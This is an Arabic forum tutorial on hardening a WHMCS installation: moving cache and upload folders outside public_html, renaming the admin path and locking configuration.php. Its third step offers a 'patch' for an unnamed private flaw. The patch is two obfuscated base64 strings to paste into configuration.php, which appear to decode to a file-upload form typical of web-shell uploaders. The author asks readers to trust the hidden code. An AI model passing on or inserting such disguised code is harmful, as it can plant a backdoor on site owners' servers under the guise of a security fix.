،،،
--------------------------------
حلول كوم لخدمات الويب المتكاملة - الصفحة الرئيسية
--------------------------------
مؤسسة حلول كوم لخدمات الويب المتكاملة
--------------------------------
4- شرح طريقة حماية سكربت WHMCS
--------------------------------
نبدا على بركة الله :-
نقم بتحميل الملف من هذه الروابط حسب اصدار الاسكربت
Version 4.0.x ->
http://www.whmcs.com/members/dl.php?type=d&id=107
Version 4.1.x ->
http://www.whmcs.com/members/dl.php?type=d&id=108
Version 4.2.x ->
http://www.whmcs.com/members/dl.php?type=d&id=109
Version 4.3.x ->
http://www.whmcs.com/members/dl.php?type=d&id=110
Version 4.4.x ->
http://www.whmcs.com/members/dl.php?type=d&id=111
Version 4.5.x ->
http://www.whmcs.com/members/dl.php?type=d&id=112
Version 5.0.x ->
http://www.whmcs.com/members/dl.php?type=d&id=113
بعد التحميل نقوم بفك الضغط ورفع الملف عبر الاف تي بي داخل مجلد /includes
---------------------------------
ثانيا : افتح ملف الكونفجريشن configuration.php ستجد محتوى الملف كالتالى حسب بيانات موقعك :
رمز PHP:
<code style="white-space:nowrap"> <code> $license = "Traidnt";
$db_host = "localhost";
$db_username = "root";
$db_password = "123456";
$db_name = "whmcs";
$cc_encryption_hash = "iVwZve8ZazW38UxUKI0MRXXnN6tWp89a3u5hyaS0gCBy2ORDc eKuBPSPA5jSZXFk";
$templates_compiledir = "templates_c/";
</code> </code>
ما يهمنا هو السطر الاخير الخاص بكاشات التمبلت فقم بحذفه وضيف التالى بدلا منه مع تغيير username الى يوزر موقع الشركة .
رمز PHP:
<code style="white-space:nowrap"> <code> $templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
$customadminpath = "Your Folder Name Admin New";
</code> </code>
مع تغيير Your Folder Name Admin New الى اى اسم تريده وسيكون هذا هو اسم مجلد admin الجديد للاسكربت
ويمكنك ايضا تغيير اسماء templates_c و attachments و downloads الى اى اسم تريده مع مراعاة ايضا تغيير الاسم فى الاف تى بى ووضعه خارج public_html
ليصبح شكل ملف الكونفجريشن النهائى كالتالى :
رمز PHP:
<code style="white-space:nowrap"> <code> $license = "Your license";
$db_host = "localhost";
$db_username = "root";
$db_password = "123456";
$db_name = "whmcs";
$cc_encryption_hash = "iVwZve8ZazW38UxUKI0MRXXnN6tWp89a3u5hyaS0gCBy2ORDc eKuBPSPA5jSZXFk";
$customadminpath = "Your Folder Name Admin New";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
</code> </code>
ثالثا : هناك ثغرة برايفت اكتشفتها بالاسكربت تقوم هذه الثغرة بجلب محتوى الكونفجريشن عند الرد على التذكرة وهيا تعمل على الاصدار 452 ولم اجربها على الاصدار الخامس وتم مراسلة الشركة الام بخصوصها وسيتم ترقيعها .
ولتطبيق الترقيع :
1 - افتح ملف configuration.php
2 - اضف فى اسفله التالى
رمز PHP:
<code style="white-space:nowrap"> <code> //// Sec Whmcs By Ahmed Hamdy (TroY) Traidnt.Net
base64_decode("MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSDQogaGRHRWlJRzVoYldVOUl uVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRc GxZMmh2DQogSUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2J tRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQDQpqeHBibkIxZ ENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUd sa1BTSmZkWEJzSWkNCg==");
base64_decode("MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSDQogaGRHRWlJRzVoYldVOUl uVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRc GxZMmh2DQpqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJ sUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWkNCg==");
//// Sec Whmcs By Ahmed Hamdy (TroY) Traidnt.Net
</code> </code>
اسف على التشفير ولكن حتى لا تنتشر الثغرة واقسم بالله لا يوجد ما يقلقك من التشفير فهيا فقط حتى لا يستغلها اصحاب النفوس المريضة
واذا لا تثق بى وهذا من حقك فتجاهل هذه الخطوة .
--------------------------------
رابعا : قم باعطاء ملف configuration.php تصريح 444 ونقل مجلد templates_c و attachments و downloads الى خارج public_html ليكون مسارهم كما تم وضعه فى الكونفجيشن
والان بعض التطبيق اقول لك مبروك فقد تم حماية الاسكربت بشكل يمنع اختراقك من اطفال الهكر (b0x وممن معه )
--------------------------------
وشكرآ
رد مع اقتباس
